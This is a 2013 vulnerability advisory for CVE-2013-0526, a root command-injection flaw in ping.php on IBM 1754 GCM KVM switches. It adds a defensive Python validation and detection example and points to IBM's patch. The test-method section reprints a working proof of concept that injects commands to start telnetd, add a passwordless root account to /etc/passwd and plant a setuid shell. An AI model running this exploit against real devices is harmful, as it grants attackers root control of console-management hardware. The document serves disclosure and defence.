Published: 2013-08-16
Updated: 2013-08-20
Affected systems:
IBM 1754 GCM GCM32
IBM 1754 GCM GCM16
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 61816
CVE(CAN) ID: CVE-2013-0526
The IBM 1754 GCM series provides KVM-over-IP and serial console management in a single device.
IBM 1754 GCM16 Global Console Manager 1.18.0.22011 and IBM 1754 GCM32 Global Console Manager 1.18.0.22011 contain multiple command-execution vulnerabilities; successful exploitation lets an attacker execute arbitrary commands with root privileges. The flaw is caused by web application variables that are not properly filtered: the $count and $size parameters of ping.php allow a crafted URL to inject text into exec(), which then runs arbitrary commands on the KVM's embedded Linux.
<*Source: Alejandro Alvarez Bravo
Link:
?lndocid=MIGR-5093509
*>
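The advisory's root cause is that ping.php hands the size and count form fields to exec() without filtering. The following is an added example, not code from the advisory, from IBM or from the device firmware, showing what correct handling of that request looks like: every field is validated against the narrow type it is supposed to have, the ping command is built as an argument vector that never passes through a shell, and a small detection helper flags request bodies where size, count or address carry shell metacharacters instead of a plain value. The field names (address, action, size, count) are taken from the advisory's request; the ping binary path, the size and count limits and the metacharacter set are assumptions made here.

```python
import re
import ipaddress
from urllib.parse import parse_qs

# Assumed limits for this example; a real device would pick its own.
MAX_SIZE = 65500   # ICMP payload bytes
MAX_COUNT = 10     # packets per request
PING_BIN = "/bin/ping"  # assumed path

# Characters that have meaning to a shell and never belong in an integer or an IP.
SHELL_META = re.compile(r"""[;&|`$<>\n\r\\'"(){}*?]""")
UNSIGNED_INT = re.compile(r"[0-9]+")


def validate_ping_params(body):
    """Parse an application/x-www-form-urlencoded body and return the validated
    fields. Raises ValueError for anything that is not exactly what a ping
    request needs: one value per field, an IP literal, bounded integers."""
    fields = parse_qs(body, keep_blank_values=True, strict_parsing=True)

    def single(name):
        values = fields.get(name, [])
        if len(values) != 1:
            raise ValueError("expected exactly one %s field" % name)
        return values[0]

    if single("action") != "ping":
        raise ValueError("unsupported action")
    # ip_address() rejects hostnames and any trailing shell text.
    address = str(ipaddress.ip_address(single("address")))
    size_s, count_s = single("size"), single("count")
    if not (UNSIGNED_INT.fullmatch(size_s) and UNSIGNED_INT.fullmatch(count_s)):
        raise ValueError("size and count must be unsigned integers")
    size, count = int(size_s), int(count_s)
    if not (0 <= size <= MAX_SIZE and 1 <= count <= MAX_COUNT):
        raise ValueError("size or count out of range")
    return {"address": address, "size": size, "count": count}


def build_ping_argv(params):
    """Argument vector for subprocess.run(argv) with shell=False. Nothing in it is
    interpreted by a shell, so the injection described in the advisory has no
    channel even if validation were later loosened."""
    return [PING_BIN, "-c", str(params["count"]), "-s", str(params["size"]),
            params["address"]]


def flag_injection_attempt(body):
    """Detection helper for web or proxy logs: True when any of the ping fields
    carries shell metacharacters, which a legitimate form submission never does."""
    fields = parse_qs(body, keep_blank_values=True)
    for name in ("size", "count", "address"):
        for value in fields.get(name, []):
            if SHELL_META.search(value):
                return True
    return False


if __name__ == "__main__":
    # Constructed sample bodies: a normal submission and one shaped like the
    # advisory's request, with shell text appended to count.
    normal = "address=255.255.255.255&action=ping&size=56&count=1"
    injected = normal + " ; echo *E* ; echo *E*"
    print(build_ping_argv(validate_ping_params(normal)))
    print("flagged:", flag_injection_attempt(injected))
    try:
        validate_ping_params(injected)
    except ValueError as exc:
        print("rejected:", exc)
```

The two controls are independent: validation rejects the request at the edge, and the argv form removes the shell from the execution path, so a mistake in one does not reopen the hole. The detection helper can be run over logged request bodies to spot attempts against devices that have not yet received the vendor patch.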
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Use at your own risk!
# Python 2 proof of concept as published with the advisory (pycurl and StringIO
# are Python 2 modules). The lines that extraction had wrapped are rejoined here
# and comments added; the behaviour is unchanged.
from StringIO import StringIO
import pycurl
import re

sessid = "XXXXXXXXX"                    # avctSessionId cookie of a logged-in web session
target = "https://ip.of.kvm/ping.php"   # ping.php on the KVM's web interface

# Shell text that ping.php passes to exec() unfiltered as part of the count parameter.
command = ("/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd"
           " ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to"
           " device using telnet with user target and pass target, then \"/tmp/su -"
           " superb\"")

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER, 0)   # the device's self-signed certificate is not verified
c.setopt(c.SSL_VERIFYHOST, 0)
c.setopt(c.WRITEFUNCTION, storage.write)
# Ordinary ping form fields with the injected text appended to count=1; the
# *E* markers delimit the command output in the returned page.
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1'
                       ' ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE, 'avctSessionId=' + sessid)
try:
    c.perform()
    c.close()
except:
    print ""
content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*", content)   # output between the two markers
print x1.group(1).replace("<br />", "\n")
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
IBM
---
IBM has released a security bulletin (MIGR-5093509) and the corresponding patch:
MIGR-5093509: IBM GCM16 KVM Switch Remote Command Execution (CVE-2013-0526)
Link: ?lndocid=MIGR-5093509